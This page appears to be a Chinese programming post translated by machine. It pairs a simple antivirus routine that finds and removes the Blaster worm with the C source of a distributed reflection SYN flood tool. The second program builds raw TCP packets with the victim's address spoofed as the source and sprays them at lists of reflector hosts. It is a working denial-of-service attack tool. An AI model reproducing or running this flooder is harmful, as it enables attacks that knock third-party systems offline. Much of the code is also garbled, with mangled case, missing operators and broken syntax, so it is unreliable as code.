Clear virus code

#define debugmsg # include #include #include #include #include #include "psapi.h" #pragma Comment (libment) , "Psapi.lib") # Define erron getLastError () #define FIVE 50 # define high 255tchar name [file] = {0}; // Save the file name path file number File * GFP = null; // output to file BOOL ScanVXER (LPTSTR V_FileName, long V_FileOffset, int V_Length, TCHAR * V_Contents); // matches the signature function BOOL ScanFileVXER (LPTSTR FileName); // file traversal function BOOL ProcessVXER (void); // enumeration process function BOOL killProc (DWORD process); // kill process functions BOOL EnablePrivilege (LPTSTR PrivileGename); // Extremely Permissions Functions BOOL Regdelvxer (Void); // Delete Registry Key Functions Void Usage (LPCTSTSTR Parameter); // Help Function Int Main (int Main) Argc, tchar * argv []) {if (argc! = 2) {usage (argv [0]); return 0;} #ifdef debugmsg gfp = fopen ("vxer.txt", "a "); if (GFP == NULL) {Printf ("Open / "Vxer.txt/" fail / n "); return 0;} fprintf (GFP,"% s / n / n "," [--------- ---------------- File List -----------------------] "); #ENDIF IF(Strlen (Argv [1])> 10) {Printf ("Fine Name No Larger Than /" 10 / "/ N"); Return 0;} IF (! (SCANFILEVXER (Argv [1]))) {#ifDef Debugmsg Printf ("ScanFileVxer () getLastError Reports% D / N", Erron); #ndif fclose (GFP); return 0;}}}}) {#ifdef debugmsg printf ("ProcessesVxer () getLastError Reports % D / N ", Erron); #ndif fclose (GFP); Return 0;} =}}} (! (" Regdef Debugmsg Printf ("Regdelvxer () getLastError Reports% D / N", Erron);

#endif fclose (Gfp); return 0;} fclose (Gfp); return 0;} BOOL ScanFileVXER (LPTSTR FileName) {WIN32_FIND_DATA FindFileData; DWORD lpBufferLength = HIGH; TCHAR lpBuffer [HIGH] = {0}; TCHAR DirBuffer [HIGH] = {0}; Handle Hfind = null; uint count = 0; long fileoffset = 0x1784; // offset address int filelength = 0x77; // length tchar contents [] = {0x49, 0x20, 0x6a, 0x75, 0x73, 0x74 , 0x20, 0x77, 0x61, 0x7, 0x74, 0x20, 0x73, 0x61, 0x79, 0x20, 0x4c, 0x4f, 0x56, 0x45, 0x20, 0x59, 0x4f, 0x55, 0x20, 0x53, 0x41, 0x4e 0x21, 0x21, 0x20, 0x62, 0x69, 0x6c, 0x6c, 0x79, 0x20, 0x67, 0x61, 0x74, 0x65, 0x73, 0x20, 0x77, 0x68, 0x79, 0x20, 0x64, 0x6f, 0x20, 0x79, 0x6f, 0x75 , 0x20, 0x6d, 0x61, 0x6b, 0x65, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x70, 0x6f, 0x73, 0x73, 0x69, 0x62, 0x6c, 0x65, 0x20, 0x3f, 0x20, 0x53, 0x74, 0x6f 0x70, 0x20, 0x6d, 0x61, 0x6b, 0x69, 0x6e, 0x67, 0x20, 0x6d, 0x6f, 0x6e, 0x65, 0x79, 0x20, 0x61, 0x6e, 0x64, 0x20, 0x66, 0x69, 0 X78, 0x20, 0x79, 0x6f, 0x75, 0x72, 0x20, 0x73, 0x6f, 0x66, 0x74, 0x77, 0x61, 0x72, 0x65, 0x21, 0x21}; // from the shock wave, use to make a signature // Gets the full path if the system directory IF (GetSystemDirectory (Dirbuffth)! = 0) {if (setCurrentDirectory (Dirbuffer)! = 0) // is set to the current directory {HFIND = FindFirstFile (filename, & findfileData); // Find file IF (HFIND == Invalid_Handle_Value) {#ifdef debugmsg printf ("FindfirstFile () getLastError Reports% D / N", Erron); #ENDIF if (HFIND! = null) Findclose (HFIND); RETURN FALSE

} Else {count ; // Get the full path IF of the file IF (getFullPathname (FindFileData.cfileName, LPBufferLength, lpbuffer! = 0) {#ifdef debugmsg fprintf (GFP, "File: / T / T% S / N" , lpbuffer; #else printf ("file: / t / t% s / n", lpbuffer; #endif} else {#ifdef debugmsg printf ("getFullpathname () getLastError Reports% D / N", erron); # endif if (hFind = NULL!) FindClose (hFind); return FALSE;}} // for pattern matching work ScanVXER (FindFileData.cFileName, FileOffset, FileLength, Contents);}} while (FindNextFile (hFind, & FindFileData)) / / Continue to find the file {count ; // except if IF (strcmp (",", FIN ("." DFILEDATA.CFILENAME) == 0 || strcmp ("..", findfiledata.cfilename) == 0) {#ifdef debugmsg printf ("file no include /"./" And / "../"/n ") #Ndif if (hfind! = Null) Findclose (HFIND); Fclose (GFP); EXIT (0);} if (getFullPathname (FindfileData.cfileName, LpbufferLength, Lpbuffer, NULL)! = 0) {#ifdef debugmsg fprintf GFP, "Next File: / T% S / N", LPBUFFER); #ELSE Printf ("Next File: / T% S / N"

, lpbuffer; #ndif} else {#ifdef debugmsg printf ("GetFullPathname () getLastError Reports% D / N", Erron); #ENDIF if (hfind! = null) Findclose (HFIND); Fclose (GFP); EXIT 0);} ScanVxer (FileOffset, FileLength, Contents);} fprintf (GFP, "/ NFILE TOTAL:% D / N / N", count); FPRINTF (GFP, "% S / N / N" , "[------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ -------] / n "); Printf (" File Total:% D / N ", Count); // Print out the number of files that are founded each if (hfind! = null) FindClose (HFIND); // Turn off the search sentence Return True;} Bool ScanVxer (lptstr v_filename, // file name long v_fileoffset, // offset address int v_length, // length tchar * v_contents) // specific content {Tchar filecontents [high] = {0 }; Int CmpReturn = 0; file * fp = null; fp = fopen (v_filename, "rb"); // Open if (fp == null) {#ifdef debugmsg protein in binary read-only mode "" "" "" "FOPEN () File Open Fail / N"); #ndif false;} fseek (fp, v_fileoffset, seek_set); // pointing the file pointer to the feature code at the file offset address at FREAD (FileContents, V_Length, 1, FP); // Read the length of the content cmpreturn = MEMCMP (V_Contents, FileContents, V_Length); // for feature code matches.

Failure Returns false if (cmpreturn == 0) {#ifDef debugmsg printf ("file match completion / n"); // Print file match message #ENDIF STRCPY (Name, v_filename); // Save the file name in global variable Name IF (fp! = Null) fclose (fp); return true;} else {fclose (fp); return false;}} BOOL processVxer (void) {DWORD LPIDPROCESS [1024] = {0}; DWORD CBNEEDED_1, CBNEDED_2; Hndle hproc = null; hModule HMOD [1024] = {0}; tchar procfile [max_path]; tchar filename [file] = {0}; uint pcount = 0; int i = 0; enableprivilege (se_debug_name); // Improve debugging Process Permissions FPRINTF (GFP, "% S / N / N", "[---------------------- Process List ------- -------------------] "); STRCPY (filename," c: // Winnt // system32 // "); strcat (filename, name); // Copy the file name path to the filename variable // enumerate the process if (! (Lpidprocess, sizeof (lpidprocess), & cbneeded_1))) {#ifDef debugmsg printf ("EnumProcesses () getLastError Reports% D / N", Erron; #ndififf (HPROC) ! = NULL) CloseHandle (HPROC); Return False;} for (i = 0; i <(int) cbneeded_1 / 4; i ) {// Open the first process hproc = OpenProcess (Process_Access, False, LpidProcess I]); if (hproc) {// enumeration process module IF (HPROCESSMODULES (HPROC, HMOD, SIZEOF (HMOD), & CBNEEDED_2)) {// Enumerate Process Module file name, including full path IF (GetModuleFileNameex (HProc, HMOD [0], procfile, sizeof (procdef debugmsg fprintf (GFP, "[% 5D] / T% S / N", LPIDPROCESS [I], Procfile;

#ELSE PrintF ("[% 5D] / T% S / N", LPIDPROCESS [I], Procfile; // Output process #ENDIF // Can consider comment it off, this will not output a list of PCOUNT ; / / Do not contain filename if (Strcmp (filename, procfile) == 0) {// if included in the process.

KillProc is a custom killing function if (! (LPIDPROCESS [I]))) {#ifdef debugmsg printf ("KillProc () getLastError Reports% D / N", Erron); #ENDIF IF (hproc! = Null CLOSEHANDLE (HPROC); Fclose (GFP); exit (0);} deletefile (filename); // After killing, delete file}}}}}}}}}}}}}}}}}}}}} // Close process handle FPrintf (GFP, "/ nprocess Total:% D / N / N", PCOUNT); FPRINTF (GFP, "% S / N / N", "[---------- -------------- Process End --------------------------] "); Printf "/ nprocess Total:% D / N / N", PCOUNT); // Printing Process Return True;} Bool KillProc (DWORD Processid) {handle hproc = null; // Open Process Vxer () Process PID HPROC = OpenProcess (Process_a LL_Access, false, processid; if (hproc! = Null) {// termination process if (! (TerminateProcess (HPROC, 0))) {#ifdef debugmsg printf ("TerminateProcess () getLastError Reports% D / N", Erron ); #Ndif closeHandle (HPROC); Return False;}} else {#ifdef debugmsg printf ("OpenProcess () getLastError Reports% D / N", Erron); #ENDIF RETURN FALSE;} if (hproc! = Null) CloseHandle (HPROC); Return True;} Bool EnablePrivilege (LPTSTSTSTSTSTSTSTSTSTSTROC = NULL, HTOKEN = NULL; token_Privileges Tp; HPROC =

GetCurrentProcess (); // open the current process of a pseudo-handle // open the process access token, hToken said the new open access token identifier if (OpenProcessToken (hProc, TOKEN_ADJUST_PRIVILEGES, & hToken)!) {#Ifdef DEBUGMSG printf ( "OpenProcessToken () GetLastError reports% d / n ", erron); #endif goto Close;} // elevated permissions if (! LookupPrivilegeValue (NULL, PrivilegeName, & TP.Privileges [0] .Luid)) {#ifdef DEBUGMSG printf (" LookupPrivilegeValue () GetLasTerror Reports% D / N ", Erron); #ndif goto close;} tp.privileges [0] .attributes = se_privilege_enabled; tp.privilect = 1; // Allow permissions, mainly based on TP structure if (! AdjustTokenPrivileges (Htoken, False, & TP, SIZEOF (TP), 0, 0)) {#ifdef debugmsg printf ("AdjustTokenPrivieges () getLastError Reports% D / N", Erron); #ndif goto close;} close: if (HProc! = NULL) CloseHandle (HPROC); if (htoken! = Null) CloseHandle (HTOKEN); RETURN FALSE; if (hproc! = Null) CloseHandle HPROC); if (htoken! = null) closehandle (htokeen); returntrue;} Bool regdelvxer (void) {hkey hkey; dword ret = 0; // Open the Run item RET = regopenkeyex (HKEY_LOCAL_MACHINE, "SOFTWARE / / Microsoft // Windows // CurrentVersion // Run /// ", 0, Key_All_Access, & HKey); if (! (RET == Error_Success)) {#ifDef debugmsg printf (" RegopenKeyex () getLastError REPORTS% D / N ", Erron); #ndif return false;} // Delete key value Windows Auto Update.

ret = RegDeleteValue (hkey, "windows auto update"); if (ret == ERROR_SUCCESS) {#ifdef DEBUGMSG printf ( "Success Delete / n"); #endif} else {#ifdef DEBUGMSG printf ( "RegDeleteValue () GetLastError reports % D / N ", Erron); #ndif regclosekey (HKEY); // EXIT (0);} RegcloseKey (HKEY); // Close open registry key Return true;} void usage (lpctstr parameter) {LPCTSTR PATH = "% Systemroot% // system32 //"; fPrintf (stderr, "================================= ========================================================= "" anti-virus software simple implementation / n "" environment: Win2K Adv Server Visual C 6.0 / n "" author: dahubaobao / n "" Home: www.RingZ.org/n "" OICQ: 382690 / n "" messages: 382690 @ qq. COM / N "" Notice: This post was originally created by the loop (Ringz), please indicate the source, thank you! / n / n "" How to use: / n "% s file name.

For example:% s msblast.exe or% s * .exe / n / n "" Note: / n "" This program simply introduces the writing method of anti-virus software, so there are many imperfect places, including: / n " "1, this program is an example / n" "" "2, file traverses for impact wave worms, only search for files / N" "3, this program cannot be checked / N / N" "" "" Just use code to communicate, if there is a mistake, please include it! / n "" =================================================================================================================================================================================================== =============================== ", parameter, parameter, parameter, path);

#DEfine debugmsg # include #include #include #include #include #include #pragma Comment (libment , "ws2_32.lib") # define erron getlasterror () # define wsaerron wsagetlasterror () typef struct iPhdr // ip head {uchar verlen; // 4-digit number 4-bit length uchar TOS; // 8 Service Type TOS Ushort total_len; // 16-bit total length ushort IDNet; // 16 bit identifier Ushort flags; // 16 bits logo uchar TTL; // 8-bit TTL Uchar Proto; // 8-bit protocol Ushort checksum; // 16-bit check And Ulong Sourceip; // 32 Bit Source Address Ulong Destip; // 32 Destination Address} iphdr, * piphdr, * lpiphdr; typef struct tcphdr // TCP header {ushort sport; // 16 bits source port Ushort Dport; // 16 Bit Destination Port Ulong SEQ; // 32-bit serial number Ulong Ack; // 32 bit identification number uchar lenres; // 4-bit length 6 reserved word uchar flags; // 6 bit flag Ushort Winsize; // 16-bit window Value ushort checksum; // 16-bit checksum Ushort URP; // 16-bit emergency data offset} TCPHDR, * PTCPHDR, * LPTCPHDR; TYPEDEF STRUCT PSDHDR / / TCP fake department {ulong saddr; // 32-bits source address Ulong Daddr; // 32-bit destination address tchar MBZ; // No Tchar Protol; // Protocol USHORT TCPLEN; / / length} PSDHDR, * PPSDHDR, * LPPSDHDR; TYPEDEDEF STRUCT DRDOSSYNINFO // Parameter structure {uint timeout; // timeout time uint IPLISTNUM; / / IP list counter uint portListNum; // port list counter ULONG AttacksourceIP; // destination IP, set to source IP usort attacksourcePort; // destination port, set to source port Tchar destip [1986] [16]; // Store IP list, reflective source, set-to-purpose IP Tchar Destport [1986] [8]; // store port list, reflected source, set to destination port} DRDOSSYNINFO, * PDRDossynInInfo, * LPDRDossynInInfo; DWORD WINAPI DRDOSSYNFLOODER (LPVOID LPDRDOS); // Flood attack master function ushort checksum (ushort * buffer, int size); // Calculate the check and void usage (LPCTSTSTER Parameter);

/ / Help function int Main (int Argc, tchar * argv []) {drdossynInfo drdossyninfo; // Parameter structure Handle hthread [max_path]; // thread handle uint maxth = 0, threadnum = 0; // thread maximum and thread Counter uint destnum = 0; // destination IP and port counter TCHAR stdinip [16] = {0}, stdinport [8] = {0}; // stored IP and port tchar * Find = null; file * fp = NULL; if (argc <= 2) {usage (argv [0]); return 0;} //} can not be greater than 15 IF (Strlen (Argv [1]) <= 15) DRDossyninfo.attacksourceIP = NTOHL (INET_ADDR (Argv [1])); Else {#ifdef debugmsg printf ("Internet address no larger ten /" #ENDIF RETURN 0;} // port can not be less than 0 and greater than 65535 IF (ATOI (ARGV [ 2])> 0 && atoi (Argv [2]) <65535) DRDossyninfo.attacksourcePort = ATOI (Argv [2]); Else {#ifdef debugmsg printf ("port no less" 0 / "and larger Than /" 65535 / ""); #Ndif return 0;} // Send timeout if (argc> 3) DRDossynInfo.timeout = ATOI (argv [3]); else drdossyninfo.timeout = 666; // Default // thread maximum IF (argc > 4) { IF (ATOI (Argv [4]) <= sizeof (ulong) * 8) Maxthread = ATOI (Argv [4]); Else {#ifdef debugmsg printf ("Thread Num no less"% d / "/ n" Sizeof (ulong) * 8); #ndif return 0;}} else maxthread = 1; // default // parameter too much if (argc> 5) {usage (argv [0]); return 0;} # IFDEF DEBUGMSG / / Details of the output parameters fprintf (stderr, "attic:% s / n" "attackport:% d / n" "TIMEOUT:% D / N" "Maxthread:% D / N"

, Argv [1], DRDOSSYNINFO.TACKSOURCEPORT, DRDOSSYNINIMEOUT, MAXTHREAD; #ENDIF fp = fopen ("destip.txt", "r"); // Open the file IP of the stored IP (fp == null) { #ifdef debugmsg printf ("Open / "Destip.txt/" fail / n "); #ENDIF RETURN 0;} // Detect EOF WHILE (! Feof (fp)) {// read the target IP to stdinip fgets (stdinip , SIZEOF (stdinip), fp); Find = strchr (stdinip, '/ n'); / / Find / N if (find) * Find = '/ 0'; // Replace with / 0 // Copy to the structure STRCPY (DRDOSSYNINFO.Destip [Destnum], stdinip); //printf ("Destip :%S/N" ,Drdossyninfo.destip[destnum]); // Output Destination IP Destnum ; // Counter increment IF (destnum == 1986 ) // A group full, jump out of the loop {Printf ("IP array ful / n"); Break;}} Drdossyninfo.iplistNum = destnum-1; // Read how much IP Printf ("/ NIP List Total Num: / T% D / N ", DESTNUM); / / Output How much IP Destnum = 0 is read; // Reset 0 for reading port fclose (fp); // Close file pointer FP = FOPEN "Destport.txt "," r "); // Open the file IF (fp == null) {#ifdef debugmsg printf (" open /"destport.txt/ "ouil / n"); #ndif return 0;} why (! Feof (fp)) {// Read the purpose port to stdinport fgets (stdinport, sizeof (stdinport), fp); Find = strchr (stdinport, '/ n'); if (find) * Find = '/ 0 '; Strcpy (DRDSSYNINFO.DESTPORT [DESTNUM], stdinport); //printf("Destportf(n" ,Drdossyninfo.destport[Destnum]); destnum ; if (destnum ==

1986) {Printf ("Port Array Full / N"); Break;}} Drdossyninfo.portListNum = DESTNUM-1; // Read how many port printf ("Port List Total NUM: / T% D / N", Destnum); // Output The total read how much port // There is already a reflected source in the current structure, huh Sleep (500); Printf ("/ nStarting ... / n"); // Create an attack thread for (ThreadNum = 0; ThreadNum

WSASTARTUP (Makeword (2, 2), & WSADATA); // Initialization IF (NRET) {#ifdef debugmsg printf ("WsaStartup () error:% d / n", nret); #ENDIF return 0;} SOCK = Socket AF_INET, SOCK_RAW, IPPROTO_RAW); // Establish Socket IF (Sock == Invalid_Socket) {#ifdef debugmsg printf ("socket () getLastError REPORTS% D / N", wsaerron); #ENDIF goto clean;} // Set IP_HDRINCL, Fill yourself with packet nret = setsockopt (Sock, ipproto_ip, ip_hdrincl, (char *) & flag, sizeof (flag)); if (nret == Socket_ERROR) {#ifdef debugmsg printf ("set ip_hdrincl / n"); printf (" setsockopt () GetLastError reports% d / n ", WSAerron); #endif goto Clean;} // set send the timeout timeOut = lpDrDosSynInfo-> timeOut; nRet = setsockopt (sock, SOL_SOCKET, SO_SNDTIMEO, (char *) & timeOut, sizeof ( Timeout); if (nret == Socket_ERROR) {#ifdef debugmsg printf ("set so_sndtimeo / n"); Printf ("SETSO Ckopt () getLastError Reports% D / N ", wsaerron); #endif goto clean;} // Fill address structure Memset (& Sai, 0, SizeOf (Sai)); sai.sin_family = AF_INET; sai.sin_port = HTons (LPDRDossynInInfo -> attacksourceport); sai.sin_addr.s_addr = htonfo.dtacksourceIP; for (iPnum = 0, portnum = 0; ipnum , portnum ) {Tchar Sendbuf [256] = {0}; // Transmit buffer / / Extract the objective IP from the structure, and copy to DESTHOST, as the reflected source strcpy (Desthost, LPDRDRDOSSYNINFO-> DESTIP [ipnum]); // Printf ("% s / n", desthost); // From the structure Extract a destination port,

And copy to Destport, as a reflected source strcpy (Destport, LPDRDOSSYNINFO-> DESTPORT [Portnum]); // Printf ("% s / n", destport); // Fill IP header ipHeader.verlen = (4 << 4 | ipHeader / sizeof (ulong)); ipHeader.tos = 0; ipHeader.total_len = htons (ipHeader) sizeof (tcpHeader)); ipHeader.idnet = 1; ipHeader.Flags = 0; ipHeader.ttl = 128; ipHeader.Proto = IPPROTO_TCP; ipHeader.Checksum = 0; ipHeader.SourceIP = htonl (lpDrDosSynInfo-> AttackSourceIP); // victims IP ipHeader.DestIP = inet_addr (DestHost); // object IP // TCP header padding TCPHEADER.SPORT = HTONS (LPDRDOSSYNINFO-> Attacksource); // Victim port TCPHEADER.DPORT = HTONS (ATOI (Destport)); // destination port TCPHEADER.SEQ = 1986; tcpheader.ack = 1; tcpheader.lenRES = Sizeof (TCPHEADER) / 4 << 4 | 0); TCPHEADER.FLAGS = 2; tcpheader.winsize = 1986; tcpheader.checksum = 0; tcpheader.urp = 0; // fill TCP pseudo header psdHeader.Saddr = ipHeader.SourceIP; psdHeader.Daddr = ipHeader.DestIP; psdHeader.mbz = 0; psdHeader.Protol = IPPROTO_TCP; psdHeader.Tcplen = htons (sizeof (tcpHeader)); // calculate TCP checksum memcpy (sendBuf, & psdHeader, sizeof (psdHeader)); memcpy (sendBuf sizeof (psdHeader), & tcpHeader, sizeof (tcpHeader)); tcpHeader.Checksum = checksum ((USHORT *) sendBuf, sizeof (psdHeader) sizeof (TCPHEADER); calculate IP checksum Memcpy (SendBuf, & iPheter, SizeOf (Ipheter)); Memcpy (Sendbuf Sizeof (Ipheter), &

tcpHeader, sizeof (tcpHeader)); memset (SendBuf sizeof (ipHeader) sizeof (tcpHeader), 0,4); DataSize = sizeof (ipHeader) sizeof (tcpHeader); // packet size ipHeader.Checksum = checksum ( (USHORT *) Sendbuf, Sizeof (IpHeader) SizeOf (TCPHEADER)); Memcpy (Sendbuf, & IpHeader, Sizeof (Ipheader)); // Send DSYN = Sendto (Sock, Sendbuf, DataSize, 0, (Struct SockAddr *) & Sai, SizeOf (Sai)); IF (DSYN == Socket_ERROR) {#ifdef debugmsg printf ("Sendto () getLastError Reports% D / N", wsaerron); #ENDIF goto clean;} // ip reads the end, Reset 0 if (ipnum == lpdrdossyninfo-> iPlistNum) ipnum = 0; // port, other homoles (portnum == lpdrdossyninfo-> portListNum) portnum = 0;} clean: if (sock! = Null) // Off Socket CloseSocket (SOCK); WSACLEANUP (); Return 1;} Ushort Checksum (Ushort * Buffer, Int size) {ulong cksum = 0 WHILE (size> 1) {cksum = * buffer ; size- = sizeof (ushort);} if (size) cksum = * (uchar *) Buffer; cksum = (cksum >> 16) (CKSUM & 0xFFFF); CKSUM = (CKSUM >> 16); Return (~ CKSUM);} void usage (lpctstr parameter) {fprintf (stderr, "===================== =====================================